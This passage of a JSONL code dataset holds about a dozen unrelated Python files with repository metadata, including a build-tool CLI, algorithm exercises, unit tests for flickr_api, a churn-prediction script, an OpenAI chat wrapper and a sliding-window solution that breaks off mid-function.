parser_localinstall.set_defaults(func=handle_localinstall)\n\n # 添加子命令 localbuild\n parser_localbuild = subparsers.add_parser('localbuild', parents=[parent_parser])\n parser_localbuild.set_defaults(func=handle_localbuild)\n\n # 添加子命令 handle_mock\n parser_mock = subparsers.add_parser('mock', parents=[parent_parser])\n parser_mock.add_argument('-r', '--root', default=None, help=\"specific mock config\")\n parser_mock.add_argument('-s', '--srpm', nargs=\"+\", default=None, help=\"build specific srpm\")\n parser_mock.set_defaults(func=handle_mock)\n\n # 添加子命令 clean\n parser_clean = subparsers.add_parser('clean', parents=[parent_parser])\n parser_clean.set_defaults(func=handle_clean)\n\n # 添加子命令 check\n parser_check = subparsers.add_parser('check', parents=[parent_parser])\n parser_check.set_defaults(func=handle_check)\n\n # 开始解析命令\n args = parser.parse_args()\n\n # 解析命令后解析配置文件,合并两者\n for filename in os.listdir('.'):\n if filename.endswith(\".mbuild\"):\n print(\"load config file %s\" % filename)\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n match = re.match(r'(\\w+)\\s*=\\s*([\\w/.-]+)', line)\n if match:\n key = match.group(1)\n value = match.group(2)\n # 如果命令行没有定义key,则使用配置中的KV\n if not hasattr(args, key):\n setattr(args, key, value)\n # 如果命令行未打开选项,但配置中打开,则使用配置中的KV\n if getattr(args, key) is None:\n setattr(args, key, value)\n\n if args.version:\n print(\"mbuild %s\" % CURRENT_VERSION)\n sys.exit(0)\n elif args.help or len(sys.argv) < 2:\n parser.print_help()\n sys.exit(0)\n else:\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yifengyou/mbuild","sub_path":"mbuild.py","file_name":"mbuild.py","file_ext":"py","file_size_in_byte":22417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"73408741449","text":"\"\"\"\n못생긴 수(31p) \n\n못생긴 수란 오직 2, 3, 5만을 소인수로 가지는 수를 의미한다. 1은 못생긴 수라고 가정한다. 이때 n번째 못생긴 수를 찾는 프로그램을 작성하시오. 예를 들어 11번째 못생긴 수는 15입니다.\n(1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, ...)\n\n입력\n첫째 줄에 n이 입력(1부터 1000까지)\n\n출력\nn번째 못생긴 수 출력\n\"\"\"\n\nn=int(input())\n\ndp=[0]*n\ndp[0]=1\n\ni2,i3,i5=0,0,0\nnext2,next3,next5=2,3,5\n\nfor i in range(1,n):\n\tdp[i]=min(next2,next3,next5)\n\n\t#못생긴 수에 2 or 3 or 5를 곱한 수도 못생긴 수\n\n\tif dp[i]==next2:\n\t\ti2+=1\n\t\tnext2=dp[i2]*2\n\tif dp[i]==next3:\n\t\ti3+=1\n\t\tnext3=dp[i3]*3\n\tif dp[i]==next5:\n\t\ti5+=1\n\t\tnext5=dp[i5]*5\n\nprint(dp[n-1])\n\t\t","repo_name":"YoungWoongJoo/Learning-Algorithm-With-Python","sub_path":"Dynamic Programming/practice5.py","file_name":"practice5.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39027666041","text":"from data_loading import gazeRE_DataLoader\nfrom features.feature_extractor import LongestVisitFeatureExtractor, extract_training_data\n\nif __name__ == '__main__':\n # Set the minimal number of fixations for a visit and the minimal visit duration to be considered\n min_fixations = 0\n min_visit_duration = 3\n\n # Set the feature export directory\n target_dir = \"./\"\n\n # Intialize the gazeRE_Dataloader which loads the dataset\n dataloader = gazeRE_DataLoader(data_dir=\"data\", googleNQ=True, gREL=True)\n\n # Initialize the FeatureExtractor with LongestVisitFeatureExtractor which takes the longest visit for each paragraph\n feature_extractor = LongestVisitFeatureExtractor(\n min_visit_duration=min_visit_duration, min_fixations=min_fixations, screen_width=2560, screen_height=1440\n )\n\n # Extract the feature file for the g-REL corpus\n d_grel = extract_training_data(study_data=dataloader.grel, target_dir=target_dir,\n feature_extractor=feature_extractor)\n\n # Extract the feature file for the Google NQ corpus\n d_nq = extract_training_data(study_data=dataloader.google_nq, target_dir=target_dir,\n feature_extractor=feature_extractor)\n","repo_name":"DFKI-Interactive-Machine-Learning/gazeRE-dataset","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41013889408","text":"import flickr_api as f\nimport unittest\n\n\nclass TestPhotoSizes(unittest.TestCase):\n def test_video_largest_size(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"video\")\n self.assertEqual(\"HD MP4\", p._getLargestSizeLabel())\n\n def test_video_none_entry(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n 700:\n dict(\n media=\"video\",\n url=\"v@url2\",\n source=\"v@source2\",\n width=None,\n height=None)\n },\n media=\"video\")\n self.assertEqual(\"HD MP4\", p._getLargestSizeLabel())\n\n def test_video_output_filename(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n )\n },\n media=\"video\")\n self.assertEqual(\"source.mp4\", p._getOutputFilename(\"source\", \"HD MP4\"))\n self.assertEqual(\"source.mp4\", p._getOutputFilename(\"source.mp4\", \"HD MP4\"))\n self.assertEqual(\"source.jpeg\", p._getOutputFilename(\"source.jpeg\", \"HD MP4\"))\n\n def test_photo_output_filename(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p/source.jpg\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"source.jpg\", p._getOutputFilename(\"source\", \"Large\"))\n self.assertEqual(\"source.jpg\", p._getOutputFilename(\"source.jpg\", \"Large\"))\n self.assertEqual(\"source.jpeg\", p._getOutputFilename(\"source.jpeg\", \"Large\"))\n\n\n def test_photo_largest_size(self):\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"HD MP4\":\n dict(\n media=\"video\",\n url=\"v@url\",\n source=\"v@source\",\n width=100,\n height=100,\n ),\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"Large\", p._getLargestSizeLabel())\n\n def test_photo_largest_size_original(self):\n \"\"\"Test that the original size is returned if it is as big as the largest size\"\"\"\n p = f.objects.Photo(\n id=1234,\n sizes={\n \"Large\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000),\n \"Original\":\n dict(\n media=\"photo\",\n url=\"p@url\",\n source=\"p@source\",\n width=2000,\n height=2000)\n },\n media=\"photo\")\n self.assertEqual(\"Original\", p._getLargestSizeLabel())\n\n def test_parse_inline_sizes(self):\n self.maxDiff = None\n sizes = f.objects._parse_inline_sizes({\n 'title':\n 'Noir comme le soleil',\n 'owner':\n f.objects.Person(id=\"qwerty\", token=\"abcde\"),\n 'id':\n 16180339,\n 'ispublic':\n True,\n 'isfriend':\n False,\n 'isfamily':\n False,\n 'url_c':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_c.jpg',\n 'height_c':\n 534,\n 'width_c':\n '800',\n 'url_l':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_b.jpg',\n 'height_l':\n '684',\n 'width_l':\n '1024',\n 'url_o':\n 'https://farm5.staticflickr.com/X/46284324564_2baac8acd5_o.jpg',\n 'height_o':\n '4016',\n 'width_o':\n '6016',\n 'media':\n 'photo',\n })\n self.assertEqual({\n 'Original': {\n 'label':\n 'Original',\n 'width':\n '6016',\n 'height':\n '4016',\n 'source':\n 
'https://farm5.staticflickr.com/X/46284324564_2baac8acd5_o.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/o/',\n 'media':\n 'photo'\n },\n 'Medium 800': {\n 'label':\n 'Medium 800',\n 'width':\n '800',\n 'height':\n 534,\n 'source':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_c.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/c/',\n 'media':\n 'photo'\n },\n 'Large': {\n 'label':\n 'Large',\n 'width':\n '1024',\n 'height':\n '684',\n 'source':\n 'https://farm5.staticflickr.com/X/46284324564_0a1bf6145a_b.jpg',\n 'url':\n 'https://www.flickr.com/photos/qwerty/16180339/sizes/l/',\n 'media':\n 'photo'\n },\n }, sizes)\n","repo_name":"alexis-mignon/python-flickr-api","sub_path":"test/test_parse_sizes.py","file_name":"test_parse_sizes.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"16"}
+{"seq_id":"41793445934","text":"import os.path\n\nimport yaml\n\nfrom agents.agents_factory import create_agent_by_type\nfrom agents.base_agent import BASE_AGENT_TYPE\nfrom config.constants import DEFAULT_START_PROMPT_PATH, INITIAL_USER_INPUT, PRESETS_DIR\n\n\nclass AgentConfig:\n # consturctor\n def __init__(self, commands_set_path=None,\n model='gpt-3.5-turbo', max_tokens=4000,\n temperature=0.1, top_p=1, frequency_penalty=0, presence_penalty=0,\n include_constraints_resources_prompt=True, include_response_format_prompt=True,\n include_commands_set=True, save_model=True, autonomous=False, type=BASE_AGENT_TYPE,\n prompt_start_path=DEFAULT_START_PROMPT_PATH,\n default_user_input=INITIAL_USER_INPUT, max_personal_goals=5):\n\n if not prompt_start_path:\n prompt_start_path = DEFAULT_START_PROMPT_PATH\n\n self.config_map = {\n 'type': type,\n 'model': model,\n 'top_p': top_p,\n 'save_model': save_model,\n 'autonomous': autonomous,\n 'max_tokens': max_tokens,\n 'temperature': temperature,\n 'prompt_start_path': prompt_start_path,\n 'presence_penalty': presence_penalty,\n 'frequency_penalty': frequency_penalty,\n 'commands_set_path': commands_set_path,\n 'default_user_input': default_user_input,\n 'max_personal_goals': max_personal_goals,\n 'include_commands_set': include_commands_set,\n 'include_response_format_prompt': include_response_format_prompt,\n 'include_constraints_resources_prompt': include_constraints_resources_prompt,\n\n }\n\n def get(self, key):\n return self.config_map[key]\n\n def to_dict(self):\n return self.config_map\n\n def __dict__(self):\n return self.config_map\n\n @staticmethod\n def from_dict(dict_input):\n return AgentConfig(**dict_input)\n\n @staticmethod\n def from_preset(name):\n path = os.path.join(PRESETS_DIR, name)\n\n if not os.path.exists(path):\n raise Exception(\"Preset file does not exist\")\n\n with open(path, 'r') as stream:\n try:\n preset = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n raise Exception(\"Error loading preset file: \" + str(exc))\n\n config = preset['config']\n\n name = preset['name']\n role = preset['role']\n agent_type = config['type']\n\n return create_agent_by_type(name, role, config, agent_type)\n","repo_name":"SherifNeamatalla/hal9000_world","sub_path":"agents/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"36337865101","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.tree import export_graphviz\r\nfrom sklearn import tree\r\nfrom io import StringIO\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom matplotlib import pyplot as plt\r\nimport graphviz\r\n\r\ntc = pd.read_csv('./customer_churn.csv')\r\n\r\n# print(\"Row:\", tc.shape[0])\r\n# print(\"\\nColumn:\", tc.shape[1])\r\n# print(\"\\nFeatures: \\n\", tc.columns.tolist())\r\n# print(\"\\nMissing Values: \\n\", tc.isnull().sum().values.sum())\r\n# print(\"\\nUnique Values: \\n\", tc.nunique())\r\n\r\ntc['TotalCharges'] = tc['TotalCharges'].replace(\" \", np.nan)\r\ntc =tc[tc['TotalCharges'].notnull()]\r\ntc= tc.reset_index()[tc.columns]\r\ntc['TotalCharges'] = tc['TotalCharges'].astype(float)\r\n# tc.head()\r\n\r\nreplace_cols = ['OnlineSecurity', 'OnlineBackup', 'DeviceProtection',\r\n 'TechSupport','StreamingTV', 'StreamingMovies']\r\nfor i in replace_cols:\r\n tc[i] = tc[i].replace({\"No internet service\" : \"No\"})\r\n# print(tc['OnlineSecurity'].head(15))\r\n\r\ntc[\"SeniorCitizen\"] = tc[\"SeniorCitizen\"].replace({1:\"Yes\", 0:\"No\"})\r\n\r\ndef tenure_cat(tc):\r\n \r\n if tc[\"tenure\"] <= 12:\r\n return \"Tenure_0-12\"\r\n \r\n elif (tc[\"tenure\"] > 12) & (tc[\"tenure\"] <= 24 ):\r\n return \"Tenure_12-24\"\r\n \r\n elif (tc[\"tenure\"] > 24) & (tc[\"tenure\"] <= 48) :\r\n return \"Tenure_24-48\"\r\n \r\n elif (tc[\"tenure\"] > 48) & (tc[\"tenure\"] <= 60) :\r\n return \"Tenure_48-60\"\r\n \r\n elif tc[\"tenure\"] > 60 :\r\n return \"Tenure_gt_60\"\r\n \r\ntc[\"tenure_grp\"] = tc.apply(lambda tc:tenure_cat(tc),\r\n axis = 1)\r\n\r\n#customer id col\r\nId_col = ['customerID']\r\n#Target columns\r\ntarget_col = [\"Churn\"]\r\n#categorical columns\r\ncat_cols = tc.nunique()[tc.nunique() < 6].keys().tolist()\r\ncat_cols = [x for x in cat_cols if x not in target_col]\r\n# print(cat_cols)\r\n\r\n#numerical columns\r\nnum_cols = [x for x in tc.columns if x not in cat_cols + target_col + Id_col]\r\n\r\n#Binary columns with 2 values\r\nbin_cols = tc.nunique()[tc.nunique() == 2].keys().tolist()\r\n# print(\" \")\r\n\r\nmulti_cols = [i for i in cat_cols if i not in bin_cols]\r\n\r\n#Label encoding Binary columns\r\nle = LabelEncoder()\r\n# print(bin_cols)\r\nfor i in bin_cols :\r\n # print(i)\r\n tc[i] = le.fit_transform(tc[i])\r\n \r\n#Duplicating columns for multi value columns\r\ntc = pd.get_dummies(data = tc,columns = multi_cols )\r\n# print(tc.head())\r\n\r\nstd = StandardScaler()\r\nscaled = std.fit_transform(tc[num_cols])\r\nscaled = pd.DataFrame(scaled,columns=num_cols)\r\n# print(scaled)\r\n\r\ntc = tc.drop(columns=['tenure_grp_Tenure_12-24', 'tenure_grp_Tenure_0-12', 'tenure_grp_Tenure_24-48', 'tenure_grp_Tenure_48-60', 'tenure_grp_Tenure_gt_60'])\r\n\r\ndf_tc_og = tc.copy()\r\ntc = tc.drop(columns = num_cols,axis = 1)\r\ntc = tc.merge(scaled,left_index=True,right_index=True,how = \"left\")\r\n\r\nbin_cols = tc.nunique()[tc.nunique() == 2].keys().tolist()\r\nle = LabelEncoder()\r\n# print(bin_cols)\r\nfor i in bin_cols :\r\n # print(i)\r\n tc[i] = le.fit_transform(tc[i])\r\n \r\n# print(tc.head())\r\n# print(tc.columns)\r\n\r\nId_col = ['customerID']\r\ntarget_col = ['Churn']\r\n\r\n# print(tc[\"tenure_grp\"])\r\n\r\ncat_cols = tc.nunique()[tc.nunique() < 6]\r\n# print(cat_cols)\r\n\r\ncols = [i for i in tc.columns if i not in Id_col + 
target_col ]\r\n# print(cols)\r\n\r\nx = df_tc_og[cols]\r\ny = df_tc_og[target_col]\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size = 0.2)\r\n\r\n# print(tc)\r\nmodel_dt_2 = DecisionTreeClassifier(random_state = 1, max_depth = 2)\r\nmodel_dt_2.fit(x_train, y_train)\r\nmodel_dt_2_score_train = model_dt_2.score(x_train, y_train)\r\nprint(\"Training Score depth-2 : \", model_dt_2_score_train)\r\nmodel_dt_2_score_test = model_dt_2.score(x_test, y_test)\r\nprint(\"Testing Score depth-2 : \", model_dt_2_score_test)\r\n\r\n# depth-8\r\nmodel_dt_8 = DecisionTreeClassifier(random_state=1, max_depth=8, criterion = \"entropy\")\r\nmodel_dt_8.fit(x_train, y_train)\r\nmodel_dt_8_score_train = model_dt_8.score(x_train, y_train)\r\nprint(\"Training score depth-8 : \",model_dt_8_score_train)\r\nmodel_dt_8_score_test = model_dt_8.score(x_test, y_test)\r\nprint(\"Testing score depth-8 : \",model_dt_8_score_test)\r\n\r\ndot_data = tree.export_graphviz(model_dt_8, out_file=None, \r\n feature_names=cols, \r\n class_names=target_col,\r\n filled=True)\r\n\r\n# Draw graph\r\ngraph = graphviz.Source(dot_data, format=\"png\") \r\ngraph","repo_name":"RathodKaransinh/Telco-Customer-Churn-Analysis","sub_path":"cust_churn_analysis.py","file_name":"cust_churn_analysis.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27572327847","text":"from threading import Thread\r\nfrom random import randint\r\nfrom time import sleep\r\n\r\n\r\ndef main():\r\n print(\"Start Fishing Trip.\")\r\n fish_on = randint(1, 10)\r\n\r\n setup_thread = Thread(target=setup_rig)\r\n cast_thread = Thread(target=cast_line)\r\n hook_thread = Thread(target=hook_fish, args=(fish_on,))\r\n\r\n setup_thread.start()\r\n cast_thread.start()\r\n hook_thread.start()\r\n\r\n setup_thread.join()\r\n cast_thread.join()\r\n hook_thread.join()\r\n\r\n if fish_on < 4:\r\n print(\"That didn't take long.\")\r\n elif fish_on in range(4, 8):\r\n print(\"Good day to fish.\")\r\n else:\r\n print(\"Seemed like nothing was going to bite today.\")\r\n\r\n print(\"Fishing Trip complete!\")\r\n\r\n\r\ndef setup_rig():\r\n print(\"Setup saltwater fishing rig.\")\r\n\r\n\r\ndef cast_line():\r\n print(\"Cast line and wait...\")\r\n\r\n\r\ndef hook_fish(wait):\r\n sleep(wait)\r\n print(\"Set hook and reel in fish.\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"k3rl15/skill_captain_python_advanced","sub_path":"Day 5/concurrency_multithreading.py","file_name":"concurrency_multithreading.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5185104221","text":"from abc import ABCMeta, abstractmethod\nfrom dateutil import rrule\nimport datetime\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nimport alphai_calendars as mcal\n\nfrom alphai_feature_generation.cleaning import (\n select_between_timestamps,\n remove_duplicated_symbols_ohlcv,\n slice_data_dict\n)\n\nlogger = logging.getLogger(__name__)\n\nMETHOD_FIXED = 'fixed'\nMETHOD_ANNUAL = 'annual'\nMETHOD_LIQUIDITY = 'liquidity'\nMETHOD_LIQUIDITY_DAY = 'liquidity_day'\nMETHOD_FIXED_HISTORICAL = 'fixed_historical'\nHISTORICAL_UNIVERSE_COLUMNS = ('start_date', 'end_date', 'assets')\nUPDATE_FREQUENCIES = ('daily', 'weekly', 'monthly', 'yearly')\nFREQUENCY_RRULE_MAP = {'daily': rrule.DAILY, 'weekly': rrule.WEEKLY, 'monthly': rrule.MONTHLY, 'yearly': rrule.YEARLY}\nOHLCV = ('open', 'high', 'low', 'close', 'volume')\n\n\nclass AbstractUniverseProvider(metaclass=ABCMeta):\n @abstractmethod\n def get_historical_universes(self, data_dict):\n \"\"\"\n Get a dataframe with arrays of all the relevant equities between two dates, categorised by date ranges.\n :param data_dict: dict of dataframes\n :return: Dataframe with three columns ['start_date', 'end_date', 'assets']\n \"\"\"\n raise NotImplementedError\n\n\nclass VolumeUniverseProvider(AbstractUniverseProvider):\n def __init__(self,\n n_assets,\n ndays_window,\n update_frequency,\n calendar_name,\n dropna\n ):\n \"\"\"\n Provides assets according to an input universe dictionary indexed by year\n :param nassets: Number of assets to select\n :param ndays_window: Number of days over which to calculate the period liquidity\n :param update_frequency: str in ['daily', 'weekly', 'monthly', 'yearly']: updates of the historical universe\n :param exchange: the name of the calendar\n :param dropna: if True drops columns containing any nan after gaps-filling\n\n \"\"\"\n self._nassets = n_assets\n self._ndays_window = ndays_window\n self._update_frequency = update_frequency\n self._dropna = dropna\n\n self._exchange_calendar = mcal.get_calendar(calendar_name)\n\n self._nminutes_window = self._ndays_window * self._exchange_calendar.get_minutes_in_one_day()\n self._rrule = FREQUENCY_RRULE_MAP[self._update_frequency]\n\n def _get_universe_at(self, date, data_dict):\n assert (type(date) == datetime.date) or (type(date) == pd.Timestamp)\n\n selected_daily_data_dict = slice_data_dict(data_dict, slice_start=-self._ndays_window)\n assert len(selected_daily_data_dict['volume']) == self._ndays_window\n\n no_duplicates_data_dict = remove_duplicated_symbols_ohlcv(selected_daily_data_dict)\n universe_at_date = np.array(list(no_duplicates_data_dict['volume'].sum().sort_values(ascending=False).index))\n\n return universe_at_date[:self._nassets]\n\n def get_historical_universes(self, data_dict):\n\n historical_universes = pd.DataFrame(columns=HISTORICAL_UNIVERSE_COLUMNS)\n relevant_dict = {k: data_dict[k] for k in ('volume', 'close')}\n relevant_dict['volume'] = relevant_dict['volume'].resample('1D').sum().dropna(axis=[0, 1], how='all')\n relevant_dict['close'] = relevant_dict['close'].resample('1D').last().dropna(axis=[0, 1], how='all')\n\n data_timezone = relevant_dict['volume'].index.tz\n start_date = relevant_dict['volume'].index[self._ndays_window + 1]\n end_date = relevant_dict['volume'].index[-1]\n\n rrule_dates = list(rrule.rrule(self._rrule, dtstart=start_date, until=end_date))\n rrule_dates[-1] = end_date\n\n if len(rrule_dates) > 1:\n for idx, (period_start_date, period_end_date) in enumerate(zip(rrule_dates[:-1], 
rrule_dates[1:])):\n logger.debug('Calculating historical universe from: {} - {}'.format(str(period_start_date),\n str(period_end_date)))\n\n end_timestamp = pd.Timestamp(period_start_date, tz=data_timezone)\n\n historical_universes.loc[idx] = [\n period_start_date.date(),\n period_end_date.date(),\n self._get_universe_at(period_start_date.date(),\n select_between_timestamps(relevant_dict, end_timestamp=end_timestamp))\n ]\n historical_universes.iloc[-1]['end_date'] = end_date.date()\n\n elif len(rrule_dates) == 1:\n end_timestamp = pd.Timestamp(start_date, tz=data_timezone)\n historical_universes.loc[0] = [\n start_date.date(),\n end_date.date(),\n self._get_universe_at(start_date,\n select_between_timestamps(relevant_dict, end_timestamp=end_timestamp))\n ]\n return historical_universes\n","repo_name":"alpha-i/library-feature-generation","sub_path":"alphai_feature_generation/universe.py","file_name":"universe.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"33242643589","text":"import os\r\nimport sys\r\nfrom src.exceptions import CustomException\r\nfrom src.logger import logging\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom src.components.data_transformation import DataTransformation, DataTransformationConfig\r\nfrom dataclasses import dataclass\r\nfrom src.components.model_training import Trained_Model\r\n\r\n@dataclass\r\nclass DataIngestionConf:\r\n train_data_path = os.path.join('artifacts','train.csv')\r\n test_data_path = os.path.join('artifacts','test.csv')\r\n raw_data_path = os.path.join('artifacts','raw.csv')\r\n\r\nclass DataIngestion:\r\n def __init__(self):\r\n self.ingestion_conf = DataIngestionConf()\r\n \r\n def initiate_data(self):\r\n logging.info(\"We have started the data ingestion part now...\")\r\n try:\r\n df = pd.read_csv(\"C:/Users/Yashkumar Dubey/Documents/Desktop1/youtube/ML CICD Pipe/notebooks/data/laptop_data_cleaned.csv\")\r\n logging.info(\"Reaing the Dataset as Dataframe...\")\r\n os.makedirs(os.path.dirname(self.ingestion_conf.train_data_path),exist_ok=True)\r\n df.to_csv(self.ingestion_conf.raw_data_path,index=False,header=True)\r\n logging.info(\"Train test split is initiated...\")\r\n train_set,test_set = train_test_split(df,test_size=0.2,random_state=52)\r\n train_set.to_csv(self.ingestion_conf.train_data_path,index=False,header=True)\r\n test_set.to_csv(self.ingestion_conf.test_data_path,index=False,header=True)\r\n logging.info(\"Ingestion is completed\")\r\n return(\r\n self.ingestion_conf.train_data_path,\r\n self.ingestion_conf.test_data_path\r\n\r\n )\r\n except Exception as e:\r\n raise CustomException(e,sys)\r\n \r\n\r\nif __name__==\"__main__\":\r\n obj = DataIngestion()\r\n train_data,test_data = obj.initiate_data()\r\n transform = DataTransformation()\r\n new_train_data,new_test_data,new_y_train,new_y_test = transform.initiate_data_transformation(train_data,test_data)\r\n modeltrainer=Trained_Model()\r\n print(modeltrainer.initialise_training(new_train_data,new_test_data,new_y_train,new_y_test))\r\n\r\n\r\n","repo_name":"YashAPro1/ML-CICD-Pipeline","sub_path":"src/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6623525131","text":"import datetime\n\n# import classes\nfrom app.models.base_model import BaseModel\nfrom app.models import db\n\n\nclass Booth(db.Model, BaseModel):\n\t# table name\n\t__tablename__ = 'booths'\n\t# displayed fields\n\tvisible = ['id', 'user_id', 'stage_id', 'points', 'summary', 'type', 'logo_url', 'url', 'name', 'created_at', 'updated_at']\n\n\t# columns definitions\n\tid = db.Column(db.Integer, primary_key=True)\n\tuser_id = db.Column(\n\t\tdb.String(40),\n\t\tdb.ForeignKey('users.id'),\n\t\tnullable=True\n\t)\n\tuser = db.relationship('User')\n\tstage_id = db.Column(\n\t\tdb.String(40),\n\t\tdb.ForeignKey('stages.id')\n\t)\n\tstage = db.relationship('Stage')\n\tsummary = db.Column(db.Text)\n\ttype = db.Column(db.String)\n\tpoints = db.Column(db.Integer)\n\tname = db.Column(db.String(255))\n\turl = db.Column(db.String(255))\n\tlogo_url = db.Column(db.String(255))\n\tcreated_at = db.Column(db.DateTime)\n\tupdated_at = db.Column(db.DateTime)\n\n\tdef __init__(self):\n\t\tself.created_at = datetime.datetime.now()\n\t\tself.updated_at = datetime.datetime.now()\n\t\tself.summary = ''\n\t\tself.points = 0\n","repo_name":"devsummit/backend","sub_path":"app/models/booth.py","file_name":"booth.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
+{"seq_id":"6576364145","text":"'''Have a conversation with Aria, powered by OpenAI chat completion'''\n\nimport json\nimport openai\n\nclass Conversation:\n '''Object-class containing the ongoing conversation'''\n\n def __init__(self):\n '''Constructs the conversation with the necessary settings'''\n self.reset()\n with open('./data/keys.json', encoding='UTF-8') as keys:\n openai.api_key = json.load(keys)['OPEN_AI_KEY']\n\n def get_response(self, prompt: str):\n '''Sends a message to the assistant and gets the response'''\n try:\n self.messages.append({'role': 'user', 'content': prompt})\n completion = openai.ChatCompletion.create(\n model=self.model,\n messages=self.messages,\n max_tokens=self.max_tokens\n )\n self.messages.append(completion.choices[0]['message'])\n return completion.choices[0]['message']['content']\n except Exception:\n return \"I'm sorry, I don't understand.\"\n\n def reset(self):\n '''Clears all messages and sets settings back to default'''\n with open('./data/conversationSettings.json', encoding='UTF-8') as settings:\n data = json.load(settings)\n self.messages = data['settings']\n self.model = data['model']\n self.temperature = data['temperature']\n self.max_tokens = data['max_tokens']\n\nif __name__ == '__main__':\n chat = Conversation()\n print(chat.get_response(\"Whats your name\"))\n","repo_name":"AJWestley/Aria","sub_path":"Skills/conversation.py","file_name":"conversation.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71970626249","text":"\"\"\"\nYou are given an array of integers nums, there is a sliding window of size k which is moving from the very left of the array to the very right.\nYou can only see the k numbers in the window. Each time the sliding window moves right by one position.\n\nReturn the max sliding window.\nnums = [1,3,-1,4,5], k = 3\n\n[3,1,-1,4,5] => [3,4,-1,4,5]\n\n[0]=0\n[1]=1\n[2]=2\n\nidx=0 => 1\nleft=1 => 3\n\nidx=0 => 3\nleft=1 => 1\n\nha[0]=1\nha[1]=0\nha[3]=1\n\n\n\n\n\"\"\"\nimport math\nfrom typing import List\n\nimport test2\n\n\nclass Solution:\n\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n if k == 1:\n return nums\n if k == len(nums):\n return [max(nums)]\n\n handleByOrgId = {}\n handleByCurId = {}\n\n def heapDown(idx):\n left = 2 * idx + 1\n right = 2 * idx + 2\n maxIdx = idx\n\n if not (left >= k and right >= k):\n if left < k and nums[maxIdx] < nums[left]:\n maxIdx = left\n if right < k and nums[maxIdx] < nums[right]:\n maxIdx = right\n if maxIdx != idx:\n temp = nums[idx]\n nums[idx] = nums[maxIdx]\n nums[maxIdx] = temp\n\n orgIdForIdx = handleByCurId[idx]\n handleByOrgId[orgIdForIdx] = maxIdx\n\n orgIdForMaxId = handleByCurId[maxIdx]\n handleByOrgId[orgIdForMaxId] = idx\n\n handleByCurId[idx] = orgIdForMaxId\n handleByCurId[maxIdx] = orgIdForIdx\n\n heapDown(maxIdx)\n\n def heapUp(idx):\n while ((idx - 1) / 2) >= 1 and idx > 1:\n parent = math.floor((idx - 1) / 2)\n if nums[parent] < nums[idx]:\n temp = nums[idx]\n nums[idx] = nums[parent]\n nums[parent] = temp\n\n orgIdForIdx = handleByCurId[idx]\n handleByOrgId[orgIdForIdx] = parent\n\n orgIdForParent = handleByCurId[parent]\n handleByOrgId[orgIdForParent] = idx\n\n handleByCurId[idx] = orgIdForParent\n handleByCurId[parent] = orgIdForIdx\n idx = parent\n else:\n break\n\n def heapUpOrDown(idx):\n parent = math.floor((idx - 1) 